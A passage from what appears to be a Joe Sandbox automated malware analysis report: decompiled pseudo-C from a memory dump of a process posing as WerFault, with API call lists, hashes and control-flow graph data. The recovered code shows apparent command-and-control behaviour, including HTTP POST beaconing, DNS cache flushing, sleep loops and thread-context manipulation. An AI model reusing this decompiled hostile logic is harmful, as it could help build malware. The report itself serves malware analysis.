                        											}
                        											goto L35;
                        										}
                        										if( *0x289f884() == 0x7a && _v12 < 8) {
                        											_t148 = _t148 + _t148;
                        											_v12 = _v12 + 1;
                        											_v32 = _v32 + _v32;
                        											_t162 = E028617B4(_t162, _t148);
                        											if(_t162 != 0) {
                        												goto L31;
                        											}
                        										}
                        										goto L39;
                        									}
                        									_v16 = _v16 & 0x00000000;
                        									if(_v20 != 0x12e) {
                        										if(_v20 == 0xc8 || _v20 == 0xcc) {
                        											goto L29;
                        										} else {
                        											goto L23;
                        										}
                        									}
                        									 *0x28a0624 =  *0x28a0624 + 1;
                        									goto L22;
                        								}
                        								if(( *(_t163 + 0x82) & 0x00000001) == 0 || E0287AB2C( *0x289f884()) != 1) {
                        									goto L44;
                        								} else {
                        									 *0x28a061c =  *0x28a061c + 1;
                        									E0287AB6A(_t153, _v12);
                        									_t153 = _t161;
                        									_t115 =  *0x289fc10( *(_t163 + 0x12c), _t161, E028619D6(_t161), _t147, _v8);
                        									goto L18;
                        								}
                        							}
                        						}
                        					}
                        				}
                        			}

                        APIs
                        • HttpSendRequestA.WININET(?,Content-Type: application/x-www-form-urlencoded,00000000,00000000,00000000,00000000,?,00000000), ref: 0287AD26
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: HttpRequestSend
                        • String ID: Content-Type: application/x-www-form-urlencoded$HTTP/1.1$POST$]
                        • API String ID: 360639707-1613543735
                        • Opcode ID: 52dc5ac61f951d6dd7c5f65c34977344a90fa26a1e3622163c58737dbd1ac55f
                        • Instruction ID: 778b68a46057f1709617fee519cd6b458ab7be1595a66b21d29d10406168e5c7
                        • Opcode Fuzzy Hash: 52dc5ac61f951d6dd7c5f65c34977344a90fa26a1e3622163c58737dbd1ac55f
                        • Instruction Fuzzy Hash: 9D91C27ED00208EFDB29DBA4C848BFEBBB9EB45319F144819E559E2280DB74DA50CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1376 28707d7-2870818 call 2863145 call 2874b26 1381 2870821-2870828 1376->1381 1382 287081a-2870820 1376->1382 1383 2870831 1381->1383 1384 287082a-287082f 1381->1384 1385 2870836-287084c call 2863145 1383->1385 1384->1385 1389 2870853-2870861 call 28855ff call 288543c 1385->1389 1390 287084e call 2870d19 1385->1390 1396 2870866-2870880 call 28614db 1389->1396 1390->1389 1399 28708b3-28708ba 1396->1399 1400 2870882-2870889 1396->1400 1403 28708bc-28708c6 call 286cb19 1399->1403 1404 28708cb-28708d8 1399->1404 1401 287089d-28708ae 1400->1401 1402 287088b-2870899 1400->1402 1401->1399 1402->1401 1416 287089b 1402->1416 1406 2870c8c-2870c97 1403->1406 1405 28708de-28708e3 1404->1405 1404->1406 1405->1396 1408 28708e5-287091f call 2870da7 call 287499d call 28749db 1405->1408 1409 2870c9c-2870cb0 1406->1409 1410 2870c99-2870c9b 1406->1410 1408->1406 1431 2870925-287092d 1408->1431 1414 2870cb2-2870cb8 1409->1414 1415 2870cbf-2870cc7 1409->1415 1410->1409 1414->1415 1418 2870cba 1414->1418 1419 2870cd2-2870cff call 28614db * 2 Sleep 1415->1419 1420 2870cc9-2870cd0 call 287a62a 1415->1420 1416->1401 1418->1415 1419->1396 1420->1419 1432 2870933-287093b 1431->1432 1433 2870c7f-2870c88 1431->1433 1432->1433 1434 2870941-287094b 1432->1434 1433->1406 1434->1433 1435 2870951-2870959 1434->1435 1436 287095b-2870968 1435->1436 1437 287096a-287096d 1435->1437 1436->1437 1438 2870975-287098f call 28614db 1436->1438 1437->1438 1441 28709d7-2870a6f call 286e987 call 2861493 1438->1441 1442 2870991-2870994 1438->1442 1462 2870a71-2870a73 1441->1462 1463 2870aa0-2870aa6 1441->1463 1443 2870996-287099f 1442->1443 1444 28709d4-28709d6 1442->1444 1443->1444 1447 28709a1-28709b9 call 287f011 1443->1447 1444->1441 1447->1444 1452 28709bb-28709bd 1447->1452 1454 28709c1-28709cd call 28617e4 1452->1454 1455 28709bf 1452->1455 1454->1444 1459 28709cf-28709d2 1454->1459 1455->1454 1459->1441 1465 2870a74 1462->1465 1463->1462 1464 2870aa8-2870aab 1463->1464 1464->1462 1466 2870aad-2870ab1 1464->1466 1467 2870a78 1465->1467 1468 2870ab3-2870ab7 1466->1468 1469 2870abb-2870abf 1466->1469 1470 2870a80-2870a8c 1467->1470 1468->1462 1471 2870ab9 1468->1471 1469->1462 1472 2870ac1-2870ac9 1469->1472 1470->1406 1473 2870a92-2870a9b 1470->1473 1471->1472 1474 2870ae7-2870af9 call 287a6e9 1472->1474 1475 2870acb-2870ad2 1472->1475 1473->1406 1474->1462 1479 2870aff-2870b16 call 28619d6 1474->1479 1475->1474 1476 2870ad4-2870adf 1475->1476 1476->1474 1479->1462 1482 2870b1c-2870b1f 1479->1482 1482->1462 1483 2870b25-2870b28 1482->1483 1483->1462 1484 2870b2e-2870b30 1483->1484 1484->1462 1485 2870b36-2870b6e call 2861493 * 2 1484->1485 1491 2870bd3-2870be1 call 287a8e1 1485->1491 1492 2870b70-2870b7c call 288524a 1485->1492 1497 2870be3-2870bef call 287be49 1491->1497 1498 2870bf1-2870bff call 287a99e 1491->1498 1496 2870b81-2870b85 1492->1496 1499 2870b87-2870b91 1496->1499 1500 2870bb0-2870bb8 1496->1500 1507 2870ba2-2870ba4 1497->1507 1498->1497 1508 2870c01-2870c08 call 287abcb 1498->1508 1511 2870b93-2870b9b call 28855a1 1499->1511 1512 2870ba9-2870bae call 2885420 1499->1512 1509 2870bc7-2870bcc 1500->1509 1510 2870bba-2870bc5 1500->1510 1514 2870c44-2870c4b 1507->1514 1522 2870c0d-2870c1f call 287be49 1508->1522 1509->1491 1517 2870bce-2870bd1 1509->1517 1510->1491 1510->1509 1511->1512 1524 2870b9d call 2885420 1511->1524 1512->1509 1514->1465 1520 2870c51-2870c59 1514->1520 1518 2870c26-2870c37 1517->1518 1518->1467 1520->1465 1528 2870c21-2870c24 1522->1528 1529 2870c5e-2870c67 1522->1529 1524->1507 1528->1518 1531 2870c3c-2870c3e 1528->1531 1529->1465 1530 2870c6d-2870c7a 1529->1530 1530->1470 1531->1465 1531->1514
                        C-Code - Quality: 66%
                        			E028707D7(void* __eflags) {
                        				signed int _v184;
                        				char _v330;
                        				signed int _v334;
                        				short _v344;
                        				char _v350;
                        				char _v364;
                        				char _v464;
                        				char _v468;
                        				char _v602;
                        				signed int _v620;
                        				signed int _v622;
                        				signed int _v638;
                        				char _v640;
                        				char _v644;
                        				char _v648;
                        				char _v660;
                        				char* _v724;
                        				intOrPtr _v728;
                        				signed int _v732;
                        				signed int _v736;
                        				signed int _v740;
                        				short _v744;
                        				signed int _v748;
                        				signed int _v752;
                        				char _v756;
                        				char _v760;
                        				signed int _v764;
                        				signed int _v768;
                        				signed int _v772;
                        				signed int _v776;
                        				signed int _v780;
                        				intOrPtr _v784;
                        				signed int _v792;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t108;
                        				signed int _t110;
                        				intOrPtr _t112;
                        				signed char _t117;
                        				signed int _t118;
                        				signed int _t133;
                        				signed int _t136;
                        				short _t140;
                        				intOrPtr _t156;
                        				signed int _t159;
                        				void* _t162;
                        				void* _t169;
                        				signed int _t170;
                        				signed int _t171;
                        				signed int _t173;
                        				signed int _t178;
                        				signed int _t179;
                        				void* _t180;
                        				void* _t181;
                        				void* _t183;
                        				short _t185;
                        				intOrPtr _t186;
                        				signed int _t188;
                        				signed int _t192;
                        				signed int _t195;
                        				signed int _t200;
                        				signed int _t204;
                        				void* _t205;
                        				intOrPtr _t207;
                        				void* _t211;
                        				signed int _t215;
                        				signed int _t219;
                        				signed int _t220;
                        				long _t228;
                        				signed int _t230;
                        				signed int _t235;
                        
                        				_v760 = 0;
                        				_v752 = 0;
                        				E02863145(_t207, 0, __eflags,  *0x2897e84, 0x2890278);
                        				_v756 = 0;
                        				_v764 = 0;
                        				_t108 = E02874B26(_t207);
                        				_t200 = _t108;
                        				_v752 = _t200;
                        				if(_t200 == 0) {
                        					return _t108;
                        				}
                        				__eflags =  *0x289f2f4 & 0x00000020;
                        				if(__eflags == 0) {
                        					_push(0x9c4);
                        				} else {
                        					_push(0xc350);
                        				}
                        				 *0x289f90c();
                        				_t110 = E02863145(_t207, 0, __eflags,  *0x2897e84, 0x2890278); // executed
                        				__eflags = _t110;
                        				if(__eflags == 0) {
                        					E02870D19(_t207, __eflags); // executed
                        				}
                        				E028855FF(_t207); // executed
                        				_t112 = E0288543C(_t207, 0x2890278); // executed
                        				_t219 = _v748;
                        				 *0x289ec94 = _t112;
                        				while(1) {
                        					E028614DB(_t207,  &_v640, 0, 0xc0);
                        					__eflags = _v776 - 0x10;
                        					if(_v776 < 0x10) {
                        						goto L13;
                        					}
                        					L9:
                        					_t192 =  *0x2899828; // 0x6ce90000
                        					__eflags = _t192;
                        					if(_t192 != 0) {
                        						_t195 =  *0x289f928(_t192, "DnsFlushResolverCache");
                        						__eflags = _t195;
                        						if(_t195 != 0) {
                        							 *_t195();
                        						}
                        					}
                        					__eflags =  *0x28a0618 - 1;
                        					_t13 =  &_v764;
                        					 *_t13 = _v764 & 0x00000000;
                        					__eflags =  *_t13;
                        					 *0x28a0618 = 0 |  *0x28a0618 != 0x00000001;
                        					L13:
                        					__eflags =  *0x28a03e0 - 1;
                        					if( *0x28a03e0 != 1) {
                        						_t117 =  *( *0x289f2e8 + 0xa) >> 0xb;
                        						__eflags = _t117 & 0x00000001;
                        						if((_t117 & 0x00000001) != 0) {
                        							L76:
                        							_t207 =  *0x289f2e8;
                        							_t118 =  *(_t207 + 0x3e);
                        							__eflags = _t118;
                        							if(_t118 == 0) {
                        								_t118 = 0x78;
                        							}
                        							_t228 =  *(_t207 + 0x146) * _t118 * 0x3e8;
                        							__eflags = _v760 - 1;
                        							if(_v760 == 1) {
                        								_t228 = _v752;
                        								__eflags = _t228;
                        								if(_t228 == 0) {
                        									_t228 = 0x1d4c0;
                        								}
                        							}
                        							__eflags = _t219 - 1 - 0xfffe;
                        							if(_t219 - 1 <= 0xfffe) {
                        								_t228 = E0287A62A(_t228, _t207);
                        							}
                        							E028614DB(_t207,  &_v640, 0, 0xc0);
                        							E028614DB(_t207,  &_v756, 0, 0x64);
                        							Sleep(_t228); // executed
                        							_t200 = _v772;
                        							do {
                        								E028614DB(_t207,  &_v640, 0, 0xc0);
                        								__eflags = _v776 - 0x10;
                        								if(_v776 < 0x10) {
                        									goto L13;
                        								}
                        								goto L9;
                        							} while (_v764 >= 0x10);
                        							E02870DA7(_t207, _t200);
                        							E0287499D(_t200,  &_v644, _v768 * 0xc0 + _t200 + 0x156, 0xc0);
                        							_t133 = E028749DB(_v784, _t207,  &_v660);
                        							__eflags = _t133;
                        							if(_t133 <= 0) {
                        								goto L76;
                        							}
                        							__eflags = _v640 - 0xc0;
                        							if(_v640 != 0xc0) {
                        								L75:
                        								__eflags = _v764;
                        								_t97 = _v764 == 0;
                        								__eflags = _t97;
                        								_v764 = 0 | _t97;
                        								goto L76;
                        							}
                        							__eflags = _v602;
                        							if(_v602 == 0) {
                        								goto L75;
                        							}
                        							__eflags = _v620;
                        							if(_v620 == 0) {
                        								goto L75;
                        							}
                        							__eflags = _v622;
                        							if(_v622 == 0) {
                        								L23:
                        								_t136 = 3;
                        								_v622 = _t136;
                        								L24:
                        								_t220 =  *( *0x289f2e8 + 0x36);
                        								_push(2);
                        								_pop(1);
                        								E028614DB(_t207,  &_v744, 0, 0x64);
                        								__eflags = _t220;
                        								if(_t220 == 0) {
                        									L33:
                        									_t140 = 0x64;
                        									_v744 = _t140;
                        									_v736 = 1;
                        									_t230 = _v764;
                        									_v724 =  &_v640;
                        									_v732 = 0;
                        									_v728 = _t230;
                        									E0286E987( &_v640,  &_v640);
                        									 *0x289f8b4( *0x289f2e8 + 0x106);
                        									E02861493(_t207,  *0x289f2e8 + 0x46,  &_v648, 0xc0);
                        									 *0x289f8b8( *0x289f2e8 + 0x106);
                        									 *0x289f8b4( *0x289f2e8 + 0x106);
                        									_t156 =  *0x289f2e8;
                        									 *((intOrPtr*)(_t156 + 0x42)) = _t230;
                        									 *0x289f8b8(_t156 + 0x106);
                        									__eflags = _v776 - 0x64;
                        									_v792 = 0;
                        									if(_v776 == 0x64) {
                        										_t159 = _v740;
                        										__eflags = _t159;
                        										if(_t159 == 0) {
                        											goto L34;
                        										}
                        										__eflags =  *_t159 - 0xc0;
                        										if( *_t159 != 0xc0) {
                        											goto L34;
                        										}
                        										__eflags = _v732;
                        										if(_v732 != 0) {
                        											__eflags = _v736;
                        											if(_v736 == 0) {
                        												goto L34;
                        											}
                        											L45:
                        											__eflags = _v334 & 0x00000001;
                        											if(__eflags != 0) {
                        												__eflags =  *0x28a061c - 4;
                        												if(__eflags > 0) {
                        													_t67 =  &_v334;
                        													 *_t67 = _v334 & 0xfffffffe;
                        													__eflags =  *_t67;
                        													_t185 = 0x50;
                        													_v344 = _t185;
                        												}
                        											}
                        											E0287A6E9(_t207,  &_v464, __eflags);
                        											_t215 = _v740;
                        											__eflags = _t215;
                        											if(_t215 == 0) {
                        												goto L34;
                        											} else {
                        												_t162 = E028619D6(_t215 + 0x26);
                        												_t211 = ( *(_t215 + 0xa6) ^ 0x0000001a) - 1;
                        												__eflags = _t162 - 0x80;
                        												if(_t162 > 0x80) {
                        													goto L34;
                        												}
                        												__eflags = _t162 - 4;
                        												if(_t162 < 4) {
                        													goto L34;
                        												}
                        												__eflags = _t211 - 4;
                        												if(_t211 < 4) {
                        													goto L34;
                        												}
                        												__eflags = _t162 - _t211;
                        												if(_t162 != _t211) {
                        													goto L34;
                        												}
                        												E02861493(_t211,  &_v364, _t215, 0xc0);
                        												E02861493(_t211,  &_v464,  &_v772, 0x64);
                        												_v184 = 0;
                        												_t169 =  *0x289fd84( &_v350);
                        												_t204 = 0xffffffff;
                        												__eflags = _t169 - 0xffffffff;
                        												if(_t169 != 0xffffffff) {
                        													L64:
                        													_t170 = E0287A8E1(_t211,  &_v468); // executed
                        													__eflags = _t170;
                        													if(_t170 != 0) {
                        														_t171 = E0287A99E( &_v468); // executed
                        														__eflags = _t171;
                        														if(_t171 == 0) {
                        															goto L65;
                        														}
                        														_t173 = E0287ABCB( &_v468); // executed
                        														_t219 = _t173;
                        														E0287BE49( &_v468);
                        														__eflags = _t219;
                        														if(_t219 > 0) {
                        															_t92 = _t219 - 1; // -1
                        															__eflags = _t92 - 0xfffe;
                        															if(_t92 > 0xfffe) {
                        																L35:
                        																_t51 =  &_v772;
                        																 *_t51 = _v772 + 1;
                        																__eflags =  *_t51;
                        																L36:
                        																_v776 = 1;
                        																L37:
                        																__eflags = _v772 - (_v638 & 0x0000ffff);
                        																if(_v772 >= (_v638 & 0x0000ffff)) {
                        																	_v772 = _v772 & 0x00000000;
                        																	_v780 = _v780 + 1;
                        																}
                        																goto L76;
                        															}
                        															_v780 = 0;
                        															_v776 = 0;
                        															 *0x28a0624 = 0;
                        															goto L37;
                        														}
                        														__eflags = _t219 - 0xfffffffd;
                        														if(_t219 != 0xfffffffd) {
                        															__eflags = _t219 - _t204;
                        															if(_t219 != _t204) {
                        																goto L35;
                        															}
                        															L71:
                        															__eflags =  *0x28a0624 - 4;
                        															if( *0x28a0624 < 4) {
                        																_v772 = 0xea60;
                        															}
                        															goto L35;
                        														}
                        														L69:
                        														_v776 = _v776 & 0x00000000;
                        														_v784 = _v784 + 1;
                        														_v772 = 0x3e8;
                        														goto L36;
                        													}
                        													L65:
                        													E0287BE49( &_v468);
                        													L58:
                        													_t219 = _t204;
                        													goto L71;
                        												}
                        												_t178 = E0288524A( &_v330,  &_v780); // executed
                        												_t235 = _t178;
                        												__eflags = _t235;
                        												if(_t235 == 0) {
                        													_t179 =  *0x289f884();
                        													__eflags = _t179;
                        													if(_t179 == 0) {
                        														L62:
                        														__eflags = _v780;
                        														if(_v780 != 0) {
                        															goto L64;
                        														}
                        														_t219 = 0xfffffffd;
                        														goto L69;
                        													}
                        													_t180 =  *0x289fd48();
                        													__eflags = _t180 - 0x2af9;
                        													if(_t180 != 0x2af9) {
                        														goto L64;
                        													}
                        													goto L62;
                        												}
                        												_t181 =  *0x289fd84( *_t235);
                        												__eflags = _t181 - 0xffffffff;
                        												if(_t181 == 0xffffffff) {
                        													L59:
                        													E02885420(_t235);
                        													goto L62;
                        												}
                        												_t183 = E028855A1(_t181);
                        												__eflags = _t183 - 1;
                        												if(_t183 != 1) {
                        													goto L59;
                        												}
                        												E02885420(_t235);
                        												goto L58;
                        											}
                        										}
                        										__eflags = _v736;
                        										if(_v736 != 0) {
                        											goto L34;
                        										}
                        										goto L45;
                        									}
                        									L34:
                        									_t219 = 0xfffffffe;
                        									goto L35;
                        								}
                        								__eflags = _t220 - 1;
                        								if(_t220 != 1) {
                        									L32:
                        									__eflags = 1;
                        									goto L33;
                        								}
                        								_t186 =  *0x289f2e8;
                        								__eflags =  *(_t186 + 0x16) & 0x00000040;
                        								if(( *(_t186 + 0x16) & 0x00000040) != 0) {
                        									goto L32;
                        								}
                        								_v760 = 0;
                        								_t205 = 0;
                        								_t188 = E0287F011( &_v760, 0, 0);
                        								__eflags = _v772;
                        								if(_v772 == 0) {
                        									goto L32;
                        								}
                        								__eflags = _t188;
                        								if(_t188 != 0) {
                        									_t205 = 1;
                        									__eflags = 1;
                        								}
                        								E028617E4(_v760);
                        								__eflags = _t205 - 1;
                        								if(_t205 != 1) {
                        									goto L32;
                        								} else {
                        									_push(0x10);
                        									_pop(1);
                        									goto L33;
                        								}
                        							}
                        							__eflags = _v622 - 0x3e7;
                        							if(_v622 <= 0x3e7) {
                        								goto L24;
                        							}
                        							goto L23;
                        						}
                        						__eflags = _v764 - 0x10;
                        					}
                        					E0286CB19(0xbb8);
                        					goto L76;
                        				}
                        			}
                        0x028707f6
                        0x028707fa
                        0x028707fe
                        0x02870803
                        0x02870807
                        0x0287080b
                        0x02870810
                        0x02870812
                        0x02870818
                        0x02870820
                        0x02870820
                        0x02870821
                        0x02870828
                        0x02870831
                        0x0287082a
                        0x0287082a
                        0x0287082a
                        0x02870836
                        0x02870845
                        0x0287084a
                        0x0287084c
                        0x0287084e
                        0x0287084e
                        0x02870853
                        0x02870858
                        0x0287085d
                        0x02870861
                        0x02870866
                        0x02870876
                        0x0287087b
                        0x02870880
                        0x00000000
                        0x00000000
                        0x02870882
                        0x02870882
                        0x02870887
                        0x02870889
                        0x02870891
                        0x02870897
                        0x02870899
                        0x0287089b
                        0x0287089b
                        0x02870899
                        0x0287089f
                        0x028708a9
                        0x028708a9
                        0x028708a9
                        0x028708ae
                        0x028708b3
                        0x028708b3
                        0x028708ba
                        0x028708d3
                        0x028708d6
                        0x028708d8
                        0x02870c8c
                        0x02870c8c
                        0x02870c92
                        0x02870c95
                        0x02870c97
                        0x02870c9b
                        0x02870c9b
                        0x02870ca5
                        0x02870cab
                        0x02870cb0
                        0x02870cb2
                        0x02870cb6
                        0x02870cb8
                        0x02870cba
                        0x02870cba
                        0x02870cb8
                        0x02870cc2
                        0x02870cc7
                        0x02870cd0
                        0x02870cd0
                        0x02870ce1
                        0x02870cef
                        0x02870cf5
                        0x02870cfb
                        0x02870866
                        0x02870876
                        0x0287087b
                        0x02870880
                        0x00000000
                        0x00000000

                        APIs
                        • Sleep.KERNEL32(?,?,00000000,00000064,?,00000000,000000C0), ref: 02870CF5
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: DnsFlushResolverCache$LCT$`$d
                        • API String ID: 3472027048-3371752115
                        • Opcode ID: c4e635f21ff8e8e3f2e59139f8e3b03a94f452d0ce2f1bd35034e98889de7907
                        • Instruction ID: 6b865210a2116ca0e58929c77d9888914383cba7838cfbcc26d3533938e63758
                        • Opcode Fuzzy Hash: c4e635f21ff8e8e3f2e59139f8e3b03a94f452d0ce2f1bd35034e98889de7907
                        • Instruction Fuzzy Hash: 46D1C17D9483419FEB20DF68C884BAFB7E9AF84318F08492AE589D3291D770D554CB93
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 61%
                        			E02865E00(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed short _a16, intOrPtr _a20, intOrPtr* _a24, signed int _a28) {
                        				long _v8;
                        				intOrPtr _v12;
                        				struct _SECURITY_ATTRIBUTES* _v16;
                        				_Unknown_base(*)()* _v20;
                        				intOrPtr _v560;
                        				char _v736;
                        				void* _t75;
                        				signed int _t77;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t82;
                        				intOrPtr _t87;
                        				struct _SECURITY_ATTRIBUTES* _t89;
                        				intOrPtr _t93;
                        				intOrPtr _t103;
                        				intOrPtr _t104;
                        				void* _t110;
                        				signed int _t112;
                        				signed int _t114;
                        				signed short _t116;
                        				intOrPtr* _t118;
                        				signed int _t123;
                        				struct _SECURITY_ATTRIBUTES* _t128;
                        				intOrPtr _t129;
                        				void* _t133;
                        				struct _SECURITY_ATTRIBUTES* _t136;
                        				intOrPtr _t137;
                        				void* _t138;
                        				void* _t142;
                        
                        				_t128 = 0;
                        				if(_a4 == 0) {
                        					return 0;
                        				}
                        				_t75 =  *0x289f71c( *0x289ec34, 0x90, _t133);
                        				__eflags = _t75 - 1;
                        				if(_t75 != 1) {
                        					_t139 = 0x289ec1c;
                        					 *0x289f8b4(0x289ec1c, _t138);
                        					__eflags = _a28 & 0x00000010;
                        					if((_a28 & 0x00000010) == 0) {
                        						L11:
                        						__eflags = _a16 - 0x1f;
                        						if(_a16 == 0x1f) {
                        							L13:
                        							_t77 = E02865883();
                        							__eflags = _t77;
                        							if(_t77 >= 0) {
                        								L15:
                        								__eflags = _a28 & 0x00000001;
                        								if(__eflags == 0) {
                        									_t13 =  &_a28;
                        									 *_t13 = _a28 | 0x00000001;
                        									__eflags =  *_t13;
                        								}
                        								_t79 = E02880FDB(__eflags);
                        								_t80 = E0286181B(_t129);
                        								_t82 =  *0x289fdbc;
                        								_v8 = _t128;
                        								_v16 = _t128;
                        								_t22 = _t82 + 0x1f70; // 0x1f70
                        								_v20 = _t80 % (_t79 + 0xffffd120) + _t22;
                        								E028614DB(_t129,  &_v736, _t128, 0x2cc);
                        								_t142 = E0286161B(0x90);
                        								_t87 = E0286161B(0x90);
                        								_v12 = _t87;
                        								__eflags = _t142 - _t128;
                        								if(_t142 == _t128) {
                        									L37:
                        									__eflags = _v12 - _t128;
                        									if(_v12 != _t128) {
                        										E028617E4(_v12);
                        									}
                        									goto L39;
                        								} else {
                        									__eflags = _t87 - _t128;
                        									if(_t87 == _t128) {
                        										L39:
                        										__eflags = _t142 - _t128;
                        										if(_t142 != _t128) {
                        											__eflags = _v16 - _t128;
                        											if(_v16 == _t128) {
                        												E028617E4(_t142);
                        											}
                        										}
                        										_t128 = _v16;
                        										_t139 = 0x289ec1c;
                        										goto L14;
                        									}
                        									 *_t142 = 0x90;
                        									_t93 =  *0x289f890(_t128, 1, _t128, _t128);
                        									 *((intOrPtr*)(_t142 + 0x74)) = _t93;
                        									 *((intOrPtr*)(_t142 + 0x78)) =  *0x289f890(_t128, 1, _t128, _t128);
                        									 *((intOrPtr*)(_t142 + 0x8c)) =  *0x289fdb4;
                        									 *(_t142 + 8) = _a28;
                        									 *((short*)(_t142 + 2)) = _a16;
                        									 *((intOrPtr*)(_t142 + 4)) = _a20;
                        									 *((intOrPtr*)(_t142 + 0xc)) = _a12;
                        									 *((intOrPtr*)(_t142 + 0x10)) = _a8;
                        									 *((intOrPtr*)(_t142 + 0x84)) = _a4;
                        									 *((intOrPtr*)(_t142 + 0x88)) = _v20;
                        									__eflags =  *((intOrPtr*)(_t142 + 0x74)) - _t128;
                        									if( *((intOrPtr*)(_t142 + 0x74)) == _t128) {
                        										L32:
                        										_t103 =  *((intOrPtr*)(_t142 + 0x74));
                        										__eflags = _t103 - _t128;
                        										if(_t103 != _t128) {
                        											 *0x289f824(_t103);
                        										}
                        										_t104 =  *((intOrPtr*)(_t142 + 0x78));
                        										__eflags = _t104 - _t128;
                        										if(_t104 != _t128) {
                        											 *0x289f824(_t104);
                        										}
                        										E028617E4(_t142);
                        										_t142 = 0;
                        										__eflags = 0;
                        										goto L37;
                        									}
                        									E02861493(_t129, _v12, _t142, 0x90);
                        									_t110 = CreateThread(_t128, _t128, _v20, _t142, 4,  &_v8); // executed
                        									_t136 = _t110;
                        									_v16 = _t136;
                        									__eflags = _t136 - _t128;
                        									if(_t136 == _t128) {
                        										goto L32;
                        									}
                        									_v736 = 0x10007;
                        									_t112 = L02887534(_t136,  &_v736); // executed
                        									__eflags = _t112;
                        									if(_t112 != 0) {
                        										__eflags = _v560 - _t128;
                        										if(_v560 != _t128) {
                        											_v560 = E028660AA;
                        											_t114 = L028874C3(_t136,  &_v736); // executed
                        											__eflags = _t114;
                        											if(_t114 != 0) {
                        												 *(_t142 + 0x7c) = _t136;
                        												L02887364(_t129, _t136); // executed
                        												_t137 = _v12;
                        												_t116 =  *0x289f8a4( *(_t137 + 0x74), 0x5dc);
                        												__eflags = _a28 & 0x00000008;
                        												_a16 = _t116;
                        												if((_a28 & 0x00000008) != 0) {
                        													E02865AA6(_t129, _v8, 0x11b); // executed
                        												}
                        												__eflags = _a28 & 0x00000040;
                        												if((_a28 & 0x00000040) != 0) {
                        													E02865AA6(_t129, _v8, 0x10b); // executed
                        												}
                        												__eflags = _a16 - _t128;
                        												if(_a16 == _t128) {
                        													_t118 = _a24;
                        													__eflags = _t118 - _t128;
                        													if(_t118 != _t128) {
                        														 *_t118 = _v8;
                        													}
                        												}
                        												FindCloseChangeNotification( *(_t137 + 0x74)); // executed
                        											}
                        										}
                        									}
                        									goto L37;
                        								}
                        							}
                        							L14:
                        							 *0x289f8b8(_t139);
                        							_t89 = _t128;
                        							L7:
                        							goto L8;
                        						}
                        						__eflags = _a16 - 0x20;
                        						if(_a16 != 0x20) {
                        							goto L15;
                        						}
                        						goto L13;
                        					}
                        					E028657FD();
                        					_t129 =  *0x289ec34;
                        					_t123 = (_a16 & 0x0000ffff) * 0x90;
                        					__eflags =  *(_t123 + _t129 + 0x84);
                        					if( *(_t123 + _t129 + 0x84) == 0) {
                        						E02865809();
                        						goto L11;
                        					} else {
                        						E02865809();
                        						 *0x289f8b8(0x289ec1c);
                        						_t89 = 0;
                        						__eflags = 0;
                        						goto L7;
                        					}
                        				} else {
                        					_t89 = 0;
                        					L8:
                        					return _t89;
                        				}
                        			}

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,00000000,00000090), ref: 02865F88
                        • FindCloseChangeNotification.KERNEL32(?), ref: 0286603C
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseCreateFindNotificationThread
                        • String ID: $@
                        • API String ID: 4060959955-1077428164
                        • Opcode ID: 5914eeb974e939451077daf874160b7a7baddd39200c2509f227f126d219a916
                        • Instruction ID: 7a6a3a2c7db3acde05b45846e3bd1b5fb9ddcda1a7e7a24c5fa7e3eaa88c2704
                        • Opcode Fuzzy Hash: 5914eeb974e939451077daf874160b7a7baddd39200c2509f227f126d219a916
                        • Instruction Fuzzy Hash: C571647D900259ABCF21DFA4C98CABE7BF9BF04304F14446AEA49F2651D7389950CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateFileW.KERNEL32(-00000058,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?,?,02889335,00000000,?,00000000), ref: 0288914D
                        • CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000,?,?,02889335,00000000,?,00000000,00000000,0000A8C0,0000A8C0,-00000058), ref: 0288916E
                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,?,02889335,00000000,?,00000000,00000000,0000A8C0,0000A8C0,-00000058,0289EEAC), ref: 02889190
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Create$MappingView
                        • String ID: P
